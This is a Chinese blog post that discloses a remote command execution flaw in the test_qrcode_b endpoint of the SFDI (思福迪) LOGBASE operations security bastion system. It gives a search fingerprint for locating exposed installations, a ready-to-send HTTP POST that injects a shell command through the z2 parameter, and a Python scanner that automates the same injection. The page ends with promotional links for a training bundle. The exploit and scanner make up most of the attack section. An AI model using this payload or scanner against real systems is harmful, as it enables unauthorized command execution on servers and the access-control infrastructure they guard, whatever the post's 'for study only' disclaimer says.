思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞

于 2024-07-30 11:37:45 发布
阅读量70 收藏 3
点赞数 1
文章标签: 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Innocence_0/article/details/140792693
版权
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
  • 一、漏洞描述
  • 二、漏洞影响
  • 三、网络测绘
  • 四、漏洞复现
  • * 1.手动复现
    • 2.自动化复现
    • 3.python源代码

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。

二、漏洞影响

思福迪 运维安全管理系统

三、网络测绘

app=“思福迪-LOGBASE”

四、漏洞复现

登陆页面

在这里插入图片描述

1.手动复现

验证POC

POST /bhost/test_qrcode_b HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 23
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip

z1=1&z2="|id;"&z3=bhost

burp截图

在这里插入图片描述

2.自动化复现

小龙POC检测脚本正式开源,请各路大神完善和批评

小龙POCexe传送门:
小龙POC工具

小龙POC开源传送门: 小龙POC工具

3.python源代码

# SFDI_Security_Management_System_test_qrcode_b_Command_Vuln_Scan.py

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout

def Scan_SFDI_Security_Management_System_test_qrcode_b_Command_Vuln(url, proxies, headers, append_to_output):

    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    if url.endswith("/"):
        path = "bhost/test_qrcode_b"
    else:
        path = "/bhost/test_qrcode_b"

    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
        "Content-Length": "23",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": url,
        "Accept-Encoding": "gzip",
    }

    encodetext = url + path
    data='''z1=1&z2="|id;"&z3=bhost'''
    append_to_output("===================================================================", "green")
    append_to_output(f"扫描目标: {url}", "yellow")
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req1 = requests.post(encodetext, data=data, headers=headers, verify=False, timeout=20, proxies=proxies)

        if req1.status_code == 200 and 'uid' in req1.text:
            append_to_output(f"[+] {url} 存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞!!!!", "red")
        else:
            append_to_output(f"[-] {url} 不存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞", "green")
    except Timeout:
        append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
        else:
            append_to_output(str(e), "yellow")

在这里插入图片描述

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

程序员负总裁
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
思福迪Logbase运维安全管理系统test_qrcode_b接口存在远程命令执行漏洞 附POC
nnn2188185的博客
12-18 629
思福迪Logbase运维安全管理系统test_qrcode_b接口存在远程命令执行漏洞 附POC
思福迪运维安全管理系统 test_qrcode_b 命令执行
weixin_43567873的博客
03-08 53
思福迪运维安全管理系统 test_qrcode_b 命令执行
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
weixin_62352348的博客
01-15 420
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现
0xSec
12-12 1503
由于思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
QRCODE3-Test_qrcode_test_
10-03
"QRCODE3-Test_qrcode_test_" 这个标题可能指的是一个关于二维码生成器的测试项目,用于验证或评估二维码生成过程的准确性和效率。描述中的"Generator qr code test"进一步确认了这是一个关于二维码生成的测试工具。...
Delphi_QRCODE.rar_QRCODE_QRCode.dcr_delphi qrcode_delphi 二维码_qrc
09-25
3. **生成二维码**:调用`QRCode1.Generate`方法,系统会根据设定的参数生成对应的二维码图像。 4. **显示或保存二维码**:可以将生成的二维码显示在TImage控件上,或者通过流对象保存为图片文件。 四、源代码解析...
QrCodeUtil.zip_QRCODE_qrcode utild_二维码生成
09-24
在IT行业中,二维码(QrCode)是一种广泛应用于数据传输、信息存储和快速扫描的二维条形码。本文将深入探讨如何使用Java编程语言来生成二维码图片,主要基于提供的资源"QrCodeUtil.zip",这是一个包含名为...
QRCode.zip_openvc一扫码_qrcode开源库_二维码 opencv_二维码 zbar_二维码opencv
07-15
【标题】"QRCode.zip_openvc一扫码_qrcode开源库_二维码 opencv_二维码 zbar_二维码opencv" 提供了一个关于使用OpenCV和ZBar库进行二维码扫描的项目实例。这个压缩包包含了一个名为"QRCode"的解决方案文件(QRCode....
使用易备数据备份软件,践行虚拟机最佳备份方案
sanyuan7783的博客
07-26 903
新的关键业务应用程序有助于为容器和容器化工作负载赋予更大动力。但是,在可预见的未来,虚拟机的应用仍会普遍存在。容器和虚拟机可以很好地协同工作,适用于大多数关键的 IT 基础设施。因此,备份虚拟机及其包含的数据、服务和应用程序仍然是企业至关重要的任务。本文以 VMware vSphere 虚拟机为例,介绍虚拟机备份的最佳实践方法。
AccessLog| 一款开源的日志分析系统
ClkLog的博客
07-26 446
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
DNS反向解析、多域名解析、时间服务器相关配置
qq_74793290的博客
07-24 488
DNS反向解析、多域名解析、时间服务器
Linux 普通用户启动Nginx使用80端口,小于1024的端口
y393016244的博客
07-26 119
在root用户下执行
续DNS服务(逆向解析、多域名、时间服务、主从DNS服务)
qq_69920145的博客
07-24 760
DNS 逆向解析(Reverse DNS Lookup)是通过 IP 地址来查找对应的域名。通常情况下,我们通过域名来获取对应的 IP 地址,这被称为正向解析。而逆向解析则是反过来,根据已知的 IP 地址获取其对应的域名。然而,逆向解析的配置和维护相对复杂,并且不是所有的 IP 地址都有对应的有效的逆向解析记录。
制作镜像
weixin_70278423的博客
07-29 639
go+html+mysql+redis.zip go.mod go.sum info.sql Readme.md server(是编译好的二进制程序) server.go static templates。因为我们在内网的docker宿主机上远程连接到云服务器的mysql容器里,需要一个mysql的客户端工具,需要安装mariadb软件。#进入容器会进入这个目录,工作目录,在执行镜像的时候会自动创建--》家目录 ---》docker exec。
杂记-镜像
最新发布
qq_43642885的博客
07-29 139
pip intall 出现 error: subprocess-exited-with-error 错误的解决办法———————————pip install --upgrade pip setuptools==57.5.0。-i https://pypi.tuna.tsinghua.edu.cn/simple 清华。https://zhuanlan.zhihu.com/p/562707628 镜像。" . ./" 代表上一层目录。
Kubernetes存储 - Node本地存储卷
ComingLiu的博客
07-26 582
k8s存储
【国产化信创平台】虚拟机VMware Workstation Pro虚拟机下载安装
纯技术流日常开发商业开发记录总结等
07-24 285
虚拟机软件VMware Workstation Pro
nuo_qrbarcode、f_qrcode_create
09-25
nuo_qrbarcode是一款基于Python的二维码生成库,可以用来创建各种类型的二维码。通过nuo_qrbarcode库,我们可以生成含有文本、URL链接、联系方式、地理位置、Wi-Fi网络等信息的二维码。它提供了丰富的参数选项,如二维码大小、颜色、背景颜色、边框宽度等,可以根据需求自定义二维码的外观。 f_qrcode_create是一个函数,用于在程序中调用nuo_qrbarcode库来生成二维码。该函数接受输入参数,如文本内容、二维码大小等,并返回生成的二维码图像。通过调用f_qrcode_create函数,我们可以方便地在我们的程序中生成二维码。 使用nuo_qrbarcode和f_qrcode_create,我们可以轻松地在各种应用场景中生成二维码。例如,我们可以用它来生成商品的二维码,方便顾客通过扫描二维码获取更多信息;我们也可以用它来生成活动的二维码,方便参与者通过扫描二维码注册或获取活动信息;另外,我们还可以用它来生成个人名片的二维码,方便他人通过扫描二维码获取我们的联系方式。 总之,nuo_qrbarcode和f_qrcode_create为我们提供了一种简单易用的生成二维码的方式,可以帮助我们在各种场景中应用二维码技术,方便用户获取信息、参与活动或获取联系方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值